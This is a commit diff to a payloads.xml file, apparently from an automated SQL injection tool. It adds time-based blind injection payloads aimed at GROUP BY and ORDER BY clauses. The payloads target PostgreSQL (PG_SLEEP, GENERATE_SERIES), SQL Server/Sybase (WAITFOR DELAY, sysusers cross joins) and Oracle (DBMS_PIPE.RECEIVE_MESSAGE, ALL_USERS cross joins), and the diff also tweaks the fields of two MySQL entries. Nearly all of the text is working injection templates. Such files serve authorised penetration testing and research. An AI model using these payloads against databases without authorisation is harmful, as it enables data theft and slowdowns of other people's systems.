You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Copy file name to clipboardExpand all lines: xml/payloads.xml
+123-4Lines changed: 123 additions & 4 deletions
Original file line number
Diff line number
Diff line change
@@ -2841,15 +2841,15 @@ Formats:
2841
2841
<title>MySQL >= 5.0.11 time-based blind - GROUP BY and ORDER BY clauses</title>
2842
2842
<stype>5</stype>
2843
2843
<level>3</level>
2844
-
<risk>2</risk>
2844
+
<risk>1</risk>
2845
2845
<clause>2,3</clause>
2846
2846
<where>1</where>
2847
2847
<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
2848
2848
<request>
2849
2849
<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
2850
2850
</request>
2851
2851
<response>
2852
-
<time>[DELAYED]</time>
2852
+
<time>[SLEEPTIME]</time>
2853
2853
</response>
2854
2854
<details>
2855
2855
<dbms>MySQL</dbms>
@@ -2858,7 +2858,7 @@ Formats:
2858
2858
</test>
2859
2859
2860
2860
<test>
2861
-
<title>MySQL < 5.0.12 boolean-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
2861
+
<title>MySQL < 5.0.12 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
2862
2862
<stype>5</stype>
2863
2863
<level>4</level>
2864
2864
<risk>2</risk>
@@ -2875,7 +2875,126 @@ Formats:
2875
2875
<dbms>MySQL</dbms>
2876
2876
</details>
2877
2877
</test>
2878
-
<!-- TODO: add tests for other DBMSes -->
2878
+
2879
+
<test>
2880
+
<title>PostgreSQL > 8.1 time-based blind - GROUP BY and ORDER BY clauses</title>
2881
+
<stype>5</stype>
2882
+
<level>3</level>
2883
+
<risk>1</risk>
2884
+
<clause>2,3</clause>
2885
+
<where>1</where>
2886
+
<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))</vector>
2887
+
<request>
2888
+
<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))</payload>
2889
+
</request>
2890
+
<response>
2891
+
<time>[SLEEPTIME]</time>
2892
+
</response>
2893
+
<details>
2894
+
<dbms>PostgreSQL</dbms>
2895
+
<dbms_version>> 8.1</dbms_version>
2896
+
</details>
2897
+
</test>
2898
+
2899
+
<test>
2900
+
<title>PostgreSQL time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
2901
+
<stype>5</stype>
2902
+
<level>4</level>
2903
+
<risk>2</risk>
2904
+
<clause>2,3</clause>
2905
+
<where>1</where>
2906
+
<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))</vector>
2907
+
<request>
2908
+
<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))</payload>
2909
+
</request>
2910
+
<response>
2911
+
<time>[DELAYED]</time>
2912
+
</response>
2913
+
<details>
2914
+
<dbms>PostgreSQL</dbms>
2915
+
</details>
2916
+
</test>
2917
+
2918
+
<test>
2919
+
<title>Microsoft SQL Server/Sybase time-based blind - ORDER BY clauses</title>
2920
+
<stype>5</stype>
2921
+
<level>3</level>
2922
+
<risk>1</risk>
2923
+
<clause>2,3</clause>
2924
+
<where>1</where>
2925
+
<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
2926
+
<request>
2927
+
<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
2928
+
</request>
2929
+
<response>
2930
+
<time>[SLEEPTIME]</time>
2931
+
</response>
2932
+
<details>
2933
+
<dbms>Microsoft SQL Server</dbms>
2934
+
<dbms>Sybase</dbms>
2935
+
<os>Windows</os>
2936
+
</details>
2937
+
</test>
2938
+
2939
+
<test>
2940
+
<title>Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query)</title>
2941
+
<stype>5</stype>
2942
+
<level>4</level>
2943
+
<risk>2</risk>
2944
+
<clause>2,3</clause>
2945
+
<where>1</where>
2946
+
<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
2947
+
<request>
2948
+
<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
2949
+
</request>
2950
+
<response>
2951
+
<time>[DELAYED]</time>
2952
+
</response>
2953
+
<details>
2954
+
<dbms>Microsoft SQL Server</dbms>
2955
+
<dbms>Sybase</dbms>
2956
+
<os>Windows</os>
2957
+
</details>
2958
+
</test>
2959
+
2960
+
<test>
2961
+
<title>Oracle time-based blind - GROUP BY and ORDER BY clauses</title>
2962
+
<stype>5</stype>
2963
+
<level>3</level>
2964
+
<risk>1</risk>
2965
+
<clause>2,3</clause>
2966
+
<where>1</where>
2967
+
<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
2968
+
<request>
2969
+
<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
2970
+
</request>
2971
+
<response>
2972
+
<time>[SLEEPTIME]</time>
2973
+
</response>
2974
+
<details>
2975
+
<dbms>Oracle</dbms>
2976
+
</details>
2977
+
</test>
2978
+
2979
+
<test>
2980
+
<title>Oracle time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
2981
+
<stype>5</stype>
2982
+
<level>4</level>
2983
+
<risk>2</risk>
2984
+
<clause>2,3</clause>
2985
+
<where>1</where>
2986
+
<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
2987
+
<request>
2988
+
<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
2989
+
</request>
2990
+
<response>
2991
+
<time>[DELAYED]</time>
2992
+
</response>
2993
+
<details>
2994
+
<dbms>Oracle</dbms>
2995
+
</details>
2996
+
</test>
2997
+
<!-- TODO: if possible, add payload for Microsoft Access -->
2879
2998
<!-- End of time-based blind tests - GROUP BY and ORDER BY clause -->
0 commit comments